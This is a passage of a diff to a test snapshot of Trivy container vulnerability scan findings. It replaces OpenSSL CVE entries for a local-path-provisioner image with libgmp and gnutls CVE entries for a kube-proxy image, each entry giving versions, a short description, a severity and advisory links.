"libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", + "references": [ { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-43618", + "installedVersion": "2:6.1.2+dfsg-4", + "packageName": "libgmp10", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "http://seclists.org/fulldisclosure/2022/Oct/8", + "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "https://access.redhat.com/security/cve/CVE-2021-43618", + "https://bugs.debian.org/994405", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "https://security.netapp.com/advisory/ntap-20221111-0001/", + "https://ubuntu.com/security/notices/USN-5672-1", + "https://ubuntu.com/security/notices/USN-5672-2", + "https://www.cve.org/CVERecord?id=CVE-2021-43618", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "name": "Integer overflow and resultant buffer overflow via crafted input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2021-43618", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "http://seclists.org/fulldisclosure/2022/Oct/8", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://access.redhat.com/security/cve/CVE-2021-43618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://bugs.debian.org/994405", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://ubuntu.com/security/notices/USN-5672-1", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://ubuntu.com/security/notices/USN-5672-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20231", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-20231", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20231.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnutls: Use after free in client key_share extension", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-20231", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://access.redhat.com/security/cve/CVE-2021-20231", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", - ], - }, - "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20232", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-20232", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20232.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://avd.aquasec.com/nvd/cve-2021-20232", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://access.redhat.com/security/cve/CVE-2021-20232", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + }, + { + "type": "URL", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 